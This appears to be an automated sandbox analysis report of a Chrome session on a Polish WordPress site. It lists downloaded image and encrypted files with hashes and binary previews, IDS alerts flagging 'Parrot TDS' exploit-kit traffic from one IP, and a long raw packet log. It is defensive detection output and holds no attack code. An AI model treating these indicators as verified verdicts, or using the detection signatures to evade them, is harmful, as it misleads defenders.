                                                            Preview:.PNG........IHDR...,..........{.=....pHYs...#...#.x.?v.. .IDATx..}.`.u..gfg{...I.I...^E..l X...?..g........N.;....SP..r..A....!u7.wg..;.!mCv.......;;.7o>.....$IB$B.j..CL.`qz.VXX(......@..F.v.z..#.0..-M#a'...2r....p'.(.........A.......6.o.q.1cF.M0f.8...O(..o.jpVV.O@.>X..K.6.8.l6....N...O........_^....0..P.h...j.l.'.(.......8.=..4.......3.T".K.o..k.N..(VB...%..../...y.....6.ou..B0..}......(..w.Z.0...1..-.Y.~.Z@.@|.H.....Y...BS[..2.b..,..Y(|.P<:.q..$.....-.9.....m...1>...<..+|.....C5.......#g.K.}.WN....w.&..'....E....{..".k...D0.......}n.F.......Z.......P.....>.aI..f.....J...c..l...D.o.........&.|T94!..*.1..8 8.Vpat...W....n..x<U..Iw...s.Aa..tf...d..k3.3.>X..^..g<....T?>(.e.A(,BAZ.*.nLZp.Pp..q.).K.'...:.q..M4..vX0......L.])`_R....7.+.......0gI...(... .j...2.....q...$...PxR.)$.x.^.._.R..n.a.a...;^..a...W.r...R)..=..d..T~.4+C.EL.:unH.#..E.......P.|,c..ks......;wb..a.`q....[,..n....8........g....8p..`...`$L. ...z}Y.G.......R.H(fY.;)Tsh..3..
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:PNG image data, 300 x 225, 8-bit/color RGBA, non-interlaced
                                                            Category:dropped
                                                            Size (bytes):30757
                                                            Entropy (8bit):7.978363334265698
                                                            Encrypted:false
                                                            SSDEEP:768:DoXxviCPsrPEgmA75S7d21MyRNQY2ikT/rz:DsRHwcgmc5S7GMlYLkTv
                                                            MD5:A2E5641D9B7EFBDEAFB07E7C12F71F69
                                                            SHA1:0300FED7ACC0A21AD5195F14E69A23F13231C913
                                                            SHA-256:6D5BBCF3B85FE7D47DC367EE1DB1C8AF92B2448314F30019199B7359DC0B3E8C
                                                            SHA-512:58350A27DB67BB991D14A64975090C2B2766A2F01B30EE3105B931C08DC654AE4646AFF2585E3862AC979B138F26D4F54FD2CD7C40AC98BE474EB1E3E17AD6C8
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:.PNG........IHDR...,.........r|......bKGD..............pHYs...#...#.x.?v....tIME.....7:=%.... .IDATx...dW...9.\..w.Yd.lv.u.v..........$...y.....&..?....I........J...1......3+}FF.....=..d...f.V.O1X&"n.<y.7......X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...a...........n..~..%..j....2..\..z../..W..._.a...!R.2V..5.r...??88..N..R.\.\.S*..}...."....(......}..>.Z.....,...\...U......v...lnn.G.r.P..h6.va.!....t:.........h4.3+\V.~pn.p8.O..._........~........~.....u.X....h.. V..w.*........]..#..1..<.q...?.'B..].+X.G..Z..|..[......9.(.........~...)..!.0vU.`}_.J......k..+W...<...].6.r...a...!2.*V..s...F..[...+W..6Ve9M..\.v-y....B..X......Y.........+..V.,O...>.h..k..L)..u..`}W.Uy........b.h...T..!._....B..]....K..*.q.._---Y..|).b......7.........m...j..Y.e.---....F,--.e.k.V.0.8vE.`}[.U.s..?;{..]..o..g.s...n......m.......5...u.-_.5l4.................nL&.......?
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1000x500, components 3
                                                            Category:dropped
                                                            Size (bytes):7030
                                                            Entropy (8bit):1.4682117631264164
                                                            Encrypted:false
                                                            SSDEEP:24:7QK1he91Wwjx82lY2T3ouVuGyJ3VsmzQyGbaWXrRtzJg:7dqQNn2x+J3CEQyCNtO
                                                            MD5:DD615A43D9766FC3423ED87CA11F666C
                                                            SHA1:12C53803F3BBC4CE40B98C4492B757CB9CAC7188
                                                            SHA-256:CB9B011F3E8A679D2736D490AA86E6DED82126E87CCF633D8D3BF38799111C3C
                                                            SHA-512:1F3CB142A69BA6502D79B34196DC86D5173FFCAB9318205E7D0DCB9A10DFC85F772AAF15F53FCC3CBAD1F73278EE462280275C9D7ADBE8A71B381CAAC7215490
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:......Exif..II*.................Ducky.......A.....+http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:AA6E7D124A5E11E3A72FB87F6A8D2AB5" xmpMM:DocumentID="xmp.did:AA6E7D134A5E11E3A72FB87F6A8D2AB5"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:AA6E7D104A5E11E3A72FB87F6A8D2AB5" stRef:documentID="xmp.did:AA6E7D114A5E11E3A72FB87F6A8D2AB5"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d.................................................................................................................................
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:data
                                                            Category:downloaded
                                                            Size (bytes):476872
                                                            Entropy (8bit):7.999527874577173
                                                            Encrypted:true
                                                            SSDEEP:12288:RCtIZqfsUThYRgYtC+QgkjVo3nND+2MGR:QIqn9YpQgkotR
                                                            MD5:E460B74A8279FC66BECC5ECD720E05E5
                                                            SHA1:CE6B560D1BE1E9F538860A4CD183E4B4FD45A334
                                                            SHA-256:1B8A285F0B5F1D8FE4F124B9E665F9AACFCC7FF9B44B95759ECD8646C5B83108
                                                            SHA-512:72560EE7DAF814D5F6292A6B8B765CDD80FFE14DBC8CCD8438C9293A4E722C17A533DED11DCE1EC5CE35EE467021C7CD5B735BC9B94F52C768B0E05706662CB9
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/uploads/2016/02/city_1.mp4:2f8a52234edc61:5
                                                            Preview:1e.<..{9....FS..;y2.!~.S..>.|.(.....F2.5.O%].u....&X.S..l...Uu12f.P2.=...:'.e...et..3..Cwh/@.......#.....tc,........>3..........z.i^~..G..L.,...|R.k-."....1.E..P;....V...|/R7.......`D.1.T\.....B(.>s..a*.w/..P..0.l..D.m.(,>.....w.7b...x.7....r...O.h.".j.&..1.7E.\D..?M.x..$.|m..CA/.W.$1..3Yr..,r..'I.he...#-......h.-..%.....6..........-o{._^.A:.rV._X......O..f........5..W.....(......c....||.7..m.T..G.P.[.s.N...4.n..|s......]b..\..S.N...U.+w.g@.Bc...-..l..d.....5.!.....(t-..H..,.?(.....$hlP... ....e......GN.t.>....c24*.MOL..U..0L|......i.pM..c.d...\.z.<x3....$.2B..jiM...r..wAg.?...y.Y..<+..D..=....,..9-`.Z.G..hH....c.Z......6<......FP..}....t^.4.r...#..e...m.x..+D...W.B..rDd..]'..~.s...B..A.6jk.f*.o+....3.'.@..M.uT.o...R.q...k..z28..w....F....x..J"...U.......D;.e...G.).G....{j..wjw..n..T.n..G.D....(..o..AlR........x.L..?nuu.djF..5...9Y.NF.....$......X[ut.........O.J.DA>.4.(....0?..l.x.\HR..V]....h.o.....*..p.....'$..r...S.X).ht..T.g..
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 200x200, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=13, description=OLYMPUS DIGITAL CAMERA , manufacturer=OLYMPUS IMAGING CORP. , model=E-M1 , orientation=upper-left, xresolution=243, yresolution=251, resolutionunit=2, software=Adobe Photoshop Elements 7.0 Windows, datetime=2018:01:15 16:59:31], progressive, precision 8, 846x417, components 3
                                                            Category:downloaded
                                                            Size (bytes):188690
                                                            Entropy (8bit):7.9480489978542685
                                                            Encrypted:false
                                                            SSDEEP:3072:Jmg2EF8DNGz5wreRztB3r5BUjlTUN3wBEm5xFJ09jHesfIj2aqLoJwyHWK2A:9wsrRztBKANgvB09esfukLUpHD2A
                                                            MD5:349D523506DA28CAB09CE17DE89BEC96
                                                            SHA1:B48A855BCE1CDC9D824A81591755C9E7F6BEB726
                                                            SHA-256:5C469C3769CE75CC1386485EAAE1F5984F458324F10F5FC0D51AEA79DDC3A7D8
                                                            SHA-512:8EC60D8FA62C290C2CF2CD590FA332AF371C36999BB96987F5AA0A62B6C0B654E8A8D912019305A0B9987ABD31C0E028510973634BAEAE379967088E3ED59A66
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/uploads/2018/01/NB5-96K-.jpg
                                                            Preview:......JFIF..............Exif..II*........... ...................................................................(...........1...%.......2.......(.......................<...i.......L...%...............OLYMPUS DIGITAL CAMERA .OLYMPUS IMAGING CORP. .E-M1 ......'.......'..Adobe Photoshop Elements 7.0 Windows.2018:01:15 16:59:31.PrintIM.0300..%.............................................8.................P.....`... ..................................................................................................... ......................................................'.......'.......'.......'.......'..^....'.......'.......'.......'....................................................................................................................................@@........@@........@@............@@........@@........@@........................................................"...........'.......d...........0230................................................................
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:PNG image data, 300 x 225, 8-bit/color RGBA, non-interlaced
                                                            Category:downloaded
                                                            Size (bytes):20890
                                                            Entropy (8bit):7.981249898270927
                                                            Encrypted:false
                                                            SSDEEP:384:Ig8I6x4MKitjbPa71+oHlw7xXNrEeZNVanadKBc3SmhT8MICSveyE5sA0u:nqx4Mra71+42xX6ACeAmhTtWnERj
                                                            MD5:7F0FAD6D7B966FEE04BD9C0D6FDC640E
                                                            SHA1:F720B973B2ED938B446D364C3DB3EB7B223E267C
                                                            SHA-256:8E30DB985F0D926C7555548A06E0C73E57484ABB3FDF23C829E7F83FEAFEB93A
                                                            SHA-512:C14A3B2EA12B6827410EB0FB36A521B59CB2235FE9A325640C7A312990167F3D88925AF32A67E5CBEE9CD9E9BEA532C3E0F177B55EDFF102A55E950008CBFC5C
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/uploads/2015/07/disney_frozen.png
                                                            Preview:.PNG........IHDR...,.........r|......bKGD..............pHYs...#...#.x.?v....tIME......,.(v... .IDATx..w.eWu...'...V..bWWwu.. .Z.B(.$@..l$...8`.l...<.=.{<~3..<..``...$P@..PKju...+u.p..p...VUWG...~>......9.w.Z{..A".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H^.B6.[..8Z>...........b..2M.+[...Y.0.@.P4.}...|S.a....^.)=.N.........@ @ .....r.0.C6..R.D.X$..N.I....C555......B.e+I.zW.....7zzz>.....p...*.0.!...H&.d2.\cc......K...s......<y..@ .H$....`}....N..[[[....._.]...n.+...'..,....F<..l.. ..<...h..Bkk.5B..l.)X.D...m..8p..x<...........0....K...RQ..B.G....w.X..|....>.o..-.J.J2mm.>|8.h./z<.....l.)Xo.X.r.O.?~.;..-.e.J2.R............K........,k..../_..-.Jr1..wo~....UU= .C)Xo.`.w...p.....".(.l.#G.....F!DJ..kC.M...}.......+.....H$...G.>.8.[.....R.....?.,ku"..."yE$..,.Z=::....h.E.`.U...........WEKK......8NH.....B.....oE..t.%..5.F......q.G.-"..M..h....MMM.1$....&...n.m;*
                                                            No static file info
                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                            2025-01-15T11:07:57.764335+01002854066ETPRO EXPLOIT_KIT Parrot TDS NDSJ Check1178.63.214.90443192.168.2.1649731TCP
                                                            2025-01-15T11:07:58.819807+01002854066ETPRO EXPLOIT_KIT Parrot TDS NDSJ Check1178.63.214.90443192.168.2.1649738TCP
                                                            2025-01-15T11:08:00.759452+01002854066ETPRO EXPLOIT_KIT Parrot TDS NDSJ Check1178.63.214.90443192.168.2.1649761TCP
                                                            2025-01-15T11:08:01.729567+01002854066ETPRO EXPLOIT_KIT Parrot TDS NDSJ Check1178.63.214.90443192.168.2.1649774TCP
                                                            2025-01-15T11:08:01.773059+01002854066ETPRO EXPLOIT_KIT Parrot TDS NDSJ Check1178.63.214.90443192.168.2.1649771TCP
                                                            2025-01-15T11:08:01.791142+01002854066ETPRO EXPLOIT_KIT Parrot TDS NDSJ Check1178.63.214.90443192.168.2.1649773TCP
                                                            2025-01-15T11:08:01.801682+01002854066ETPRO EXPLOIT_KIT Parrot TDS NDSJ Check1178.63.214.90443192.168.2.1649775TCP
                                                            2025-01-15T11:08:01.945321+01002854066ETPRO EXPLOIT_KIT Parrot TDS NDSJ Check1178.63.214.90443192.168.2.1649776TCP
                                                            2025-01-15T11:08:02.585374+01002854066ETPRO EXPLOIT_KIT Parrot TDS NDSJ Check1178.63.214.90443192.168.2.1649781TCP
                                                            2025-01-15T11:08:02.754112+01002854066ETPRO EXPLOIT_KIT Parrot TDS NDSJ Check1178.63.214.90443192.168.2.1649780TCP
                                                            2025-01-15T11:08:02.760450+01002854066ETPRO EXPLOIT_KIT Parrot TDS NDSJ Check1178.63.214.90443192.168.2.1649785TCP
                                                            2025-01-15T11:08:02.828273+01002854066ETPRO EXPLOIT_KIT Parrot TDS NDSJ Check1178.63.214.90443192.168.2.1649784TCP
                                                            2025-01-15T11:08:02.857389+01002854066ETPRO EXPLOIT_KIT Parrot TDS NDSJ Check1178.63.214.90443192.168.2.1649786TCP
                                                            2025-01-15T11:08:02.859989+01002854066ETPRO EXPLOIT_KIT Parrot TDS NDSJ Check1178.63.214.90443192.168.2.1649787TCP
                                                            2025-01-15T11:08:02.928978+01002854066ETPRO EXPLOIT_KIT Parrot TDS NDSJ Check1178.63.214.90443192.168.2.1649783TCP
                                                            2025-01-15T11:08:02.965553+01002854066ETPRO EXPLOIT_KIT Parrot TDS NDSJ Check1178.63.214.90443192.168.2.1649789TCP
                                                            2025-01-15T11:08:03.254287+01002854066ETPRO EXPLOIT_KIT Parrot TDS NDSJ Check1178.63.214.90443192.168.2.1649790TCP
                                                            2025-01-15T11:08:03.537619+01002854066ETPRO EXPLOIT_KIT Parrot TDS NDSJ Check1178.63.214.90443192.168.2.1649793TCP
                                                            2025-01-15T11:08:03.697399+01002854066ETPRO EXPLOIT_KIT Parrot TDS NDSJ Check1178.63.214.90443192.168.2.1649794TCP
                                                            2025-01-15T11:08:03.781059+01002854066ETPRO EXPLOIT_KIT Parrot TDS NDSJ Check1178.63.214.90443192.168.2.1649797TCP
                                                            2025-01-15T11:08:03.898937+01002854066ETPRO EXPLOIT_KIT Parrot TDS NDSJ Check1178.63.214.90443192.168.2.1649795TCP
                                                            2025-01-15T11:08:03.924212+01002854066ETPRO EXPLOIT_KIT Parrot TDS NDSJ Check1178.63.214.90443192.168.2.1649799TCP
                                                            2025-01-15T11:08:03.957629+01002854066ETPRO EXPLOIT_KIT Parrot TDS NDSJ Check1178.63.214.90443192.168.2.1649800TCP
                                                            2025-01-15T11:08:04.110480+01002854066ETPRO EXPLOIT_KIT Parrot TDS NDSJ Check1178.63.214.90443192.168.2.1649801TCP
                                                            2025-01-15T11:08:04.642097+01002854066ETPRO EXPLOIT_KIT Parrot TDS NDSJ Check1178.63.214.90443192.168.2.1649805TCP
                                                            2025-01-15T11:08:05.166198+01002854066ETPRO EXPLOIT_KIT Parrot TDS NDSJ Check1178.63.214.90443192.168.2.1649813TCP
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Jan 15, 2025 11:07:51.310192108 CET4970280192.168.2.16178.63.214.90
                                                            Jan 15, 2025 11:07:51.315073967 CET8049702178.63.214.90192.168.2.16
                                                            Jan 15, 2025 11:07:51.315138102 CET4970280192.168.2.16178.63.214.90
                                                            Jan 15, 2025 11:07:51.315550089 CET4970280192.168.2.16178.63.214.90
                                                            Jan 15, 2025 11:07:51.319638014 CET4970380192.168.2.16178.63.214.90
                                                            Jan 15, 2025 11:07:51.320391893 CET8049702178.63.214.90192.168.2.16
                                                            Jan 15, 2025 11:07:51.324625969 CET8049703178.63.214.90192.168.2.16
                                                            Jan 15, 2025 11:07:51.324693918 CET4970380192.168.2.16178.63.214.90
                                                            Jan 15, 2025 11:07:51.956485033 CET8049702178.63.214.90192.168.2.16
                                                            Jan 15, 2025 11:07:52.000874043 CET4970280192.168.2.16178.63.214.90
                                                            Jan 15, 2025 11:07:52.010870934 CET49704443192.168.2.16178.63.214.90
                                                            Jan 15, 2025 11:07:52.010976076 CET44349704178.63.214.90192.168.2.16
                                                            Jan 15, 2025 11:07:52.011064053 CET49704443192.168.2.16178.63.214.90
                                                            Jan 15, 2025 11:07:52.011486053 CET49704443192.168.2.16178.63.214.90
                                                            Jan 15, 2025 11:07:52.011523008 CET44349704178.63.214.90192.168.2.16
                                                            Jan 15, 2025 11:07:52.510452032 CET49673443192.168.2.16204.79.197.203
                                                            Jan 15, 2025 11:07:52.677390099 CET44349704178.63.214.90192.168.2.16
                                                            Jan 15, 2025 11:07:52.677658081 CET49704443192.168.2.16178.63.214.90
                                                            Jan 15, 2025 11:07:52.677720070 CET44349704178.63.214.90192.168.2.16
                                                            Jan 15, 2025 11:07:52.678766012 CET44349704178.63.214.90192.168.2.16
                                                            Jan 15, 2025 11:07:52.678884983 CET49704443192.168.2.16178.63.214.90
                                                            Jan 15, 2025 11:07:52.679781914 CET49704443192.168.2.16178.63.214.90
                                                            Jan 15, 2025 11:07:52.679855108 CET44349704178.63.214.90192.168.2.16
                                                            Jan 15, 2025 11:07:52.680102110 CET49704443192.168.2.16178.63.214.90
                                                            Jan 15, 2025 11:07:52.680119038 CET44349704178.63.214.90192.168.2.16
                                                            Jan 15, 2025 11:07:52.733910084 CET49704443192.168.2.16178.63.214.90
                                                            Jan 15, 2025 11:07:52.814960003 CET49673443192.168.2.16204.79.197.203
                                                            Jan 15, 2025 11:07:53.002964973 CET44349704178.63.214.90192.168.2.16
                                                            Jan 15, 2025 11:07:53.003436089 CET44349704178.63.214.90192.168.2.16
                                                            Jan 15, 2025 11:07:53.003515005 CET49704443192.168.2.16178.63.214.90
                                                            Jan 15, 2025 11:07:53.004162073 CET49704443192.168.2.16178.63.214.90
                                                            Jan 15, 2025 11:07:53.004203081 CET44349704178.63.214.90192.168.2.16
                                                            Jan 15, 2025 11:07:53.007232904 CET49705443192.168.2.16178.63.214.90
                                                            Jan 15, 2025 11:07:53.007278919 CET44349705178.63.214.90192.168.2.16
                                                            Jan 15, 2025 11:07:53.007364035 CET49705443192.168.2.16178.63.214.90
                                                            Jan 15, 2025 11:07:53.007591963 CET49705443192.168.2.16178.63.214.90
                                                            Jan 15, 2025 11:07:53.007608891 CET44349705178.63.214.90192.168.2.16
                                                            Jan 15, 2025 11:07:53.418015003 CET49673443192.168.2.16204.79.197.203
                                                            Jan 15, 2025 11:07:53.663750887 CET44349705178.63.214.90192.168.2.16
                                                            Jan 15, 2025 11:07:53.664033890 CET49705443192.168.2.16178.63.214.90
                                                            Jan 15, 2025 11:07:53.664066076 CET44349705178.63.214.90192.168.2.16
                                                            Jan 15, 2025 11:07:53.664331913 CET44349705178.63.214.90192.168.2.16
                                                            Jan 15, 2025 11:07:53.664602041 CET49705443192.168.2.16178.63.214.90
                                                            Jan 15, 2025 11:07:53.664650917 CET44349705178.63.214.90192.168.2.16
                                                            Jan 15, 2025 11:07:53.664727926 CET49705443192.168.2.16178.63.214.90
                                                            Jan 15, 2025 11:07:53.707351923 CET44349705178.63.214.90192.168.2.16
                                                            Jan 15, 2025 11:07:54.118935108 CET44349705178.63.214.90192.168.2.16
                                                            Jan 15, 2025 11:07:54.118999004 CET44349705178.63.214.90192.168.2.16
                                                            Jan 15, 2025 11:07:54.119096994 CET49705443192.168.2.16178.63.214.90
                                                            Jan 15, 2025 11:07:54.119144917 CET44349705178.63.214.90192.168.2.16
                                                            Jan 15, 2025 11:07:54.143254042 CET49706443192.168.2.16178.63.214.90
                                                            Jan 15, 2025 11:07:54.143311024 CET44349706178.63.214.90192.168.2.16
                                                            Jan 15, 2025 11:07:54.143397093 CET49706443192.168.2.16178.63.214.90
                                                            Jan 15, 2025 11:07:54.143532991 CET49707443192.168.2.16178.63.214.90
                                                            Jan 15, 2025 11:07:54.143568039 CET44349707178.63.214.90192.168.2.16
                                                            Jan 15, 2025 11:07:54.143637896 CET49707443192.168.2.16178.63.214.90
                                                            Jan 15, 2025 11:07:54.143767118 CET49708443192.168.2.16178.63.214.90
                                                            Jan 15, 2025 11:07:54.143856049 CET44349708178.63.214.90192.168.2.16
                                                            Jan 15, 2025 11:07:54.143953085 CET49708443192.168.2.16178.63.214.90
                                                            Jan 15, 2025 11:07:54.144227982 CET49709443192.168.2.16178.63.214.90
                                                            Jan 15, 2025 11:07:54.144264936 CET44349709178.63.214.90192.168.2.16
                                                            Jan 15, 2025 11:07:54.144316912 CET49709443192.168.2.16178.63.214.90
                                                            Jan 15, 2025 11:07:54.144556046 CET49710443192.168.2.16178.63.214.90
                                                            Jan 15, 2025 11:07:54.144638062 CET44349710178.63.214.90192.168.2.16
                                                            Jan 15, 2025 11:07:54.144709110 CET49710443192.168.2.16178.63.214.90
                                                            Jan 15, 2025 11:07:54.146421909 CET49706443192.168.2.16178.63.214.90
                                                            Jan 15, 2025 11:07:54.146442890 CET44349706178.63.214.90192.168.2.16
                                                            Jan 15, 2025 11:07:54.147017002 CET49707443192.168.2.16178.63.214.90
                                                            Jan 15, 2025 11:07:54.147032976 CET44349707178.63.214.90192.168.2.16
                                                            Jan 15, 2025 11:07:54.147304058 CET49708443192.168.2.16178.63.214.90
                                                            Jan 15, 2025 11:07:54.147360086 CET44349708178.63.214.90192.168.2.16
                                                            Jan 15, 2025 11:07:54.148436069 CET49709443192.168.2.16178.63.214.90
                                                            Jan 15, 2025 11:07:54.148448944 CET44349709178.63.214.90192.168.2.16
                                                            Jan 15, 2025 11:07:54.148705959 CET49710443192.168.2.16178.63.214.90
                                                            Jan 15, 2025 11:07:54.148727894 CET44349710178.63.214.90192.168.2.16
                                                            Jan 15, 2025 11:07:54.165887117 CET49705443192.168.2.16178.63.214.90
                                                            Jan 15, 2025 11:07:54.165900946 CET44349705178.63.214.90192.168.2.16
                                                            Jan 15, 2025 11:07:54.212892056 CET49705443192.168.2.16178.63.214.90
                                                            Jan 15, 2025 11:07:54.214622974 CET44349705178.63.214.90192.168.2.16
                                                            Jan 15, 2025 11:07:54.214654922 CET44349705178.63.214.90192.168.2.16
                                                            Jan 15, 2025 11:07:54.214674950 CET44349705178.63.214.90192.168.2.16
                                                            Jan 15, 2025 11:07:54.214711905 CET49705443192.168.2.16178.63.214.90
                                                            Jan 15, 2025 11:07:54.214770079 CET49705443192.168.2.16178.63.214.90
                                                            Jan 15, 2025 11:07:54.214854002 CET44349705178.63.214.90192.168.2.16
                                                            Jan 15, 2025 11:07:54.214873075 CET44349705178.63.214.90192.168.2.16
                                                            Jan 15, 2025 11:07:54.214911938 CET49705443192.168.2.16178.63.214.90
                                                            Jan 15, 2025 11:07:54.214935064 CET49705443192.168.2.16178.63.214.90
                                                            Jan 15, 2025 11:07:54.214948893 CET44349705178.63.214.90192.168.2.16
                                                            Jan 15, 2025 11:07:54.215780973 CET44349705178.63.214.90192.168.2.16
                                                            Jan 15, 2025 11:07:54.215827942 CET44349705178.63.214.90192.168.2.16
                                                            Jan 15, 2025 11:07:54.215873003 CET49705443192.168.2.16178.63.214.90
                                                            Jan 15, 2025 11:07:54.215888977 CET44349705178.63.214.90192.168.2.16
                                                            Jan 15, 2025 11:07:54.215919018 CET49705443192.168.2.16178.63.214.90
                                                            Jan 15, 2025 11:07:54.217461109 CET44349705178.63.214.90192.168.2.16
                                                            Jan 15, 2025 11:07:54.217552900 CET49705443192.168.2.16178.63.214.90
                                                            Jan 15, 2025 11:07:54.217566967 CET44349705178.63.214.90192.168.2.16
                                                            Jan 15, 2025 11:07:54.260914087 CET49705443192.168.2.16178.63.214.90
                                                            Jan 15, 2025 11:07:54.310903072 CET44349705178.63.214.90192.168.2.16
                                                            Jan 15, 2025 11:07:54.310933113 CET44349705178.63.214.90192.168.2.16
                                                            Jan 15, 2025 11:07:54.311038971 CET44349705178.63.214.90192.168.2.16
                                                            Jan 15, 2025 11:07:54.311120033 CET49705443192.168.2.16178.63.214.90
                                                            Jan 15, 2025 11:07:54.311134100 CET44349705178.63.214.90192.168.2.16
                                                            Jan 15, 2025 11:07:54.311181068 CET49705443192.168.2.16178.63.214.90
                                                            Jan 15, 2025 11:07:54.311889887 CET44349705178.63.214.90192.168.2.16
                                                            Jan 15, 2025 11:07:54.311939001 CET44349705178.63.214.90192.168.2.16
                                                            Jan 15, 2025 11:07:54.311968088 CET49705443192.168.2.16178.63.214.90
                                                            Jan 15, 2025 11:07:54.311983109 CET44349705178.63.214.90192.168.2.16
                                                            Jan 15, 2025 11:07:54.312010050 CET49705443192.168.2.16178.63.214.90
                                                            Jan 15, 2025 11:07:54.312011003 CET44349705178.63.214.90192.168.2.16
                                                            Jan 15, 2025 11:07:54.312043905 CET44349705178.63.214.90192.168.2.16
                                                            Jan 15, 2025 11:07:54.312074900 CET49705443192.168.2.16178.63.214.90
                                                            Jan 15, 2025 11:07:54.312093973 CET44349705178.63.214.90192.168.2.16
                                                            Jan 15, 2025 11:07:54.312120914 CET49705443192.168.2.16178.63.214.90
                                                            Jan 15, 2025 11:07:54.312833071 CET44349705178.63.214.90192.168.2.16
                                                            Jan 15, 2025 11:07:54.312926054 CET49705443192.168.2.16178.63.214.90
                                                            Jan 15, 2025 11:07:54.312941074 CET44349705178.63.214.90192.168.2.16
                                                            Jan 15, 2025 11:07:54.313635111 CET44349705178.63.214.90192.168.2.16
                                                            Jan 15, 2025 11:07:54.313703060 CET49705443192.168.2.16178.63.214.90
                                                            Jan 15, 2025 11:07:54.313714981 CET44349705178.63.214.90192.168.2.16
                                                            Jan 15, 2025 11:07:54.314553976 CET44349705178.63.214.90192.168.2.16
                                                            Jan 15, 2025 11:07:54.314629078 CET49705443192.168.2.16178.63.214.90
                                                            Jan 15, 2025 11:07:54.314640999 CET44349705178.63.214.90192.168.2.16
                                                            Jan 15, 2025 11:07:54.314663887 CET44349705178.63.214.90192.168.2.16
                                                            Jan 15, 2025 11:07:54.314722061 CET49705443192.168.2.16178.63.214.90
                                                            Jan 15, 2025 11:07:54.314734936 CET44349705178.63.214.90192.168.2.16
                                                            Jan 15, 2025 11:07:54.314785957 CET49705443192.168.2.16178.63.214.90
                                                            Jan 15, 2025 11:07:54.315396070 CET44349705178.63.214.90192.168.2.16
                                                            Jan 15, 2025 11:07:54.371032953 CET49705443192.168.2.16178.63.214.90
                                                            Jan 15, 2025 11:07:54.406872034 CET44349705178.63.214.90192.168.2.16
                                                            Jan 15, 2025 11:07:54.406903982 CET44349705178.63.214.90192.168.2.16
                                                            Jan 15, 2025 11:07:54.406960964 CET49705443192.168.2.16178.63.214.90
                                                            Jan 15, 2025 11:07:54.407018900 CET49705443192.168.2.16178.63.214.90
                                                            Jan 15, 2025 11:07:54.407032967 CET44349705178.63.214.90192.168.2.16
                                                            Jan 15, 2025 11:07:54.407120943 CET44349705178.63.214.90192.168.2.16
                                                            Jan 15, 2025 11:07:54.407171011 CET44349705178.63.214.90192.168.2.16
                                                            Jan 15, 2025 11:07:54.407193899 CET49705443192.168.2.16178.63.214.90
                                                            Jan 15, 2025 11:07:54.407212973 CET44349705178.63.214.90192.168.2.16
                                                            Jan 15, 2025 11:07:54.407244921 CET49705443192.168.2.16178.63.214.90
                                                            Jan 15, 2025 11:07:54.407258034 CET44349705178.63.214.90192.168.2.16
                                                            Jan 15, 2025 11:07:54.407341957 CET49705443192.168.2.16178.63.214.90
                                                            Jan 15, 2025 11:07:54.407355070 CET44349705178.63.214.90192.168.2.16
                                                            Jan 15, 2025 11:07:54.407457113 CET44349705178.63.214.90192.168.2.16
                                                            Jan 15, 2025 11:07:54.407562017 CET49705443192.168.2.16178.63.214.90
                                                            Jan 15, 2025 11:07:54.407576084 CET44349705178.63.214.90192.168.2.16
                                                            Jan 15, 2025 11:07:54.407640934 CET49705443192.168.2.16178.63.214.90
                                                            Jan 15, 2025 11:07:54.407655001 CET44349705178.63.214.90192.168.2.16
                                                            Jan 15, 2025 11:07:54.407696009 CET44349705178.63.214.90192.168.2.16
                                                            Jan 15, 2025 11:07:54.407716036 CET49705443192.168.2.16178.63.214.90
                                                            Jan 15, 2025 11:07:54.407727957 CET44349705178.63.214.90192.168.2.16
                                                            Jan 15, 2025 11:07:54.407757998 CET49705443192.168.2.16178.63.214.90
                                                            Jan 15, 2025 11:07:54.407777071 CET49705443192.168.2.16178.63.214.90
                                                            Jan 15, 2025 11:07:54.407787085 CET44349705178.63.214.90192.168.2.16
                                                            Jan 15, 2025 11:07:54.407839060 CET44349705178.63.214.90192.168.2.16
                                                            Jan 15, 2025 11:07:54.407896042 CET49705443192.168.2.16178.63.214.90
                                                            Jan 15, 2025 11:07:54.407907963 CET44349705178.63.214.90192.168.2.16
                                                            Jan 15, 2025 11:07:54.408093929 CET44349705178.63.214.90192.168.2.16
                                                            Jan 15, 2025 11:07:54.408155918 CET49705443192.168.2.16178.63.214.90
                                                            Jan 15, 2025 11:07:54.408253908 CET49705443192.168.2.16178.63.214.90
                                                            Jan 15, 2025 11:07:54.408277035 CET44349705178.63.214.90192.168.2.16
